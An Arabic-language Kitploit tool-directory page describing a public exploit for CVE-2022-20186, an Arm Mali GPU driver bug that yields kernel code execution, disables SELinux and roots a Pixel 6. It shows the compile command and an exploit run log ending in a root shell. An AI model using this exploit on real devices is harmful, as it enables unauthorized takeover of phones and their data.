Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-20186_CTXZ — الاستغلال لـ CVE-2022-20186 الذي يستهدف ثغرة تلف الذاكرة في برنامج تشغيل نواة Arm Mali على نظام أندرويد. يحقق تنفيذ كود عشوائي في النواة، ويعطّل SELinux، ويصعد إلى صلاحيات الجذر على Pixel 6 مع دعم إصدارات متعددة من البرامج الثابتة. | Kitploit
أدوات/GitHubGitHub/bariskizilkaya/cve-2022-20186_ctxz
أمان أندرويدتصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالأمن الجوالاستغلال الملفات الثنائية
GitHubbariskizilkaya/cve-2022-20186_ctxz

CVE-2022-20186_CTXZ

الاستغلال لـ CVE-2022-20186 الذي يستهدف ثغرة تلف الذاكرة في برنامج تشغيل نواة Arm Mali على نظام أندرويد. يحقق تنفيذ كود عشوائي في النواة، ويعطّل SELinux، ويصعد إلى صلاحيات الجذر على Pixel 6 مع دعم إصدارات متعددة من البرامج الثابتة.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
32منذ 3 سنواتلم تتم المراجعة بعد

استغلال CVE-2022-20186

يمكن العثور على الشرح هنا. هذا خطأ في برنامج تشغيل نواة Arm Mali أبلغت عنه في يناير 2022. يمكن استخدام الخطأ لتحقيق تنفيذ كود عشوائي في النواة من مجال التطبيق غير الموثوق، والذي يُستخدم بعد ذلك لتعطيل SELinux والحصول على صلاحية الجذر.

تم اختبار الاستغلال على Google Pixel 6 ويدعم مستويات التصحيح من Novmember 2021 إلى Feburary 2022. من السهل إضافة دعم للبرامج الثابتة الأخرى عن طريق تغيير بعض إزاحات الصور. كمرجع، استخدمت الأمر التالي للتجميع باستخدام clang في ndk-21:

root@kitploit:~
android-ndk-r21d-linux-x86_64/android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android30-clang mali_alias.c -o mali_alias

نادرًا ما يفشل الاستغلال ويمكن إعادة المحاولة دون تعطل الجهاز. إذا نجح، يجب أن يعطل SELinux ويحصل على صلاحية الجذر.

root@kitploit:~
oriole:/ $ /data/local/tmp/mali_alias                                                                                             
fingerprint: google/oriole/oriole:12/SQ1D.220205.004/8151327:user/release-keys
tracking page 0x6ff794e000
drain 0x6d5b200000
gpu_va[0] 6ff6698000
gpu_va[1] 6ff6695000
alias 0x6ff6693000
overwrite addr : 6ff370051c 51c
overwrite addr : 6de310051c 51c
overwrite addr : 6d5f30051c 51c
overwrite addr : 6d5f10051c 51c
overwrite addr : 6d5f30051c 51c
overwrite addr : 6d5f10051c 51c
result 50
overwrite addr : 6ff370051c 51c
overwrite addr : 6de310051c 51c
overwrite addr : 6d5f30051c 51c
overwrite addr : 6d5f10051c 51c
overwrite addr : 6d5f30051c 51c
overwrite addr : 6d5f10051c 51c
result 50
oriole:/ # 
تنزيل الأداة